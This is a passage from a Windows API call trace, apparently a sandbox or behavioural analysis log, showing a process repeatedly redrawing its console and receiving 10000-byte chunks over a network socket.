hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.599] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.698] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.699] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0194.699] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0194.700] CoTaskMemFree (pv=0x2386d738460) [0194.700] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0194.700] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.701] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.776] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.776] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0194.777] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0194.777] CoTaskMemFree (pv=0x2386d738460) [0194.777] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0194.778] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.779] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.856] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.856] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0194.856] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0194.858] CoTaskMemFree (pv=0x2386d738460) [0194.858] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0194.860] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.860] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.940] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.940] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0194.940] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0194.943] CoTaskMemFree (pv=0x2386d738460) [0194.944] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0194.944] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0194.944] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.030] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.030] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0195.030] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0195.031] CoTaskMemFree (pv=0x2386d738460) [0195.031] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0195.032] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.032] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.257] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.258] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0195.258] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0195.261] CoTaskMemFree (pv=0x2386d738460) [0195.261] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0195.261] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.262] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.345] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.346] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0195.346] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0195.346] CoTaskMemFree (pv=0x2386d738460) [0195.346] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0195.347] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.347] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.422] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.423] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0195.423] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0195.424] CoTaskMemFree (pv=0x2386d738460) [0195.424] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0195.426] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.426] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.500] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.501] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0195.501] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0195.502] CoTaskMemFree (pv=0x2386d738460) [0195.502] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0195.503] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.504] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.581] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.581] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0195.582] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0195.582] CoTaskMemFree (pv=0x2386d738460) [0195.582] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0195.584] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.584] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.670] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.671] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0195.671] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0195.672] CoTaskMemFree (pv=0x2386d738460) [0195.672] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0195.672] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.672] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.749] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.749] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0195.749] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0195.750] CoTaskMemFree (pv=0x2386d738460) [0195.750] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0195.750] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.751] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.828] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.829] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0195.829] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0195.830] CoTaskMemFree (pv=0x2386d738460) [0195.830] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0195.830] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.831] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.905] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.906] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0195.906] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0195.906] CoTaskMemFree (pv=0x2386d738460) [0195.907] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0195.907] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.907] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.983] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.984] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0195.984] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0195.992] CoTaskMemFree (pv=0x2386d738460) [0195.992] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0195.992] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0195.993] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.071] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.072] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0196.072] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0196.073] CoTaskMemFree (pv=0x2386d738460) [0196.073] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0196.073] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.074] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.266] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.266] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0196.266] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0196.267] CoTaskMemFree (pv=0x2386d738460) [0196.267] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0196.268] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.268] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.344] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.345] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0196.345] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0196.346] CoTaskMemFree (pv=0x2386d738460) [0196.346] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0196.346] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.346] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.421] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.422] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0196.422] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0196.423] CoTaskMemFree (pv=0x2386d738460) [0196.423] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0196.423] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.424] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.504] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.505] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0196.505] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0196.511] CoTaskMemFree (pv=0x2386d738460) [0196.511] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0196.512] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.512] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.591] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.591] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0196.591] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0196.592] CoTaskMemFree (pv=0x2386d738460) [0196.592] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0196.593] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.593] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.676] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.677] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0196.677] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0196.677] CoTaskMemFree (pv=0x2386d738460) [0196.677] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0196.678] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.678] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.754] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.755] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0196.755] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0196.756] CoTaskMemFree (pv=0x2386d738460) [0196.756] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0196.756] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.756] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.833] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.833] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0196.833] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0196.839] CoTaskMemFree (pv=0x2386d738460) [0196.840] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0196.842] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.842] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.920] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.920] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0196.920] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0196.921] CoTaskMemFree (pv=0x2386d738460) [0196.921] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0196.922] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.922] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.998] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0196.998] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0196.998] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0196.999] CoTaskMemFree (pv=0x2386d738460) [0196.999] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0196.999] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.000] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.076] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.077] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0197.077] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0197.077] CoTaskMemFree (pv=0x2386d738460) [0197.078] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0197.079] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.079] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.277] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.277] CoTaskMemAlloc (cb=0x780) returned 0x2386d738460 [0197.278] WriteConsoleOutputW (in: hConsoleOutput=0x274, lpBuffer=0x2386d738460, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xafa508e080 | out: lpWriteRegion=0xafa508e080) returned 1 [0197.278] CoTaskMemFree (pv=0x2386d738460) [0197.278] recv (in: s=0x7fc, buf=0x238005544f8, len=10000, flags=0 | out: buf=0x238005544f8*) returned 10000 [0197.279] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0197.279] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, 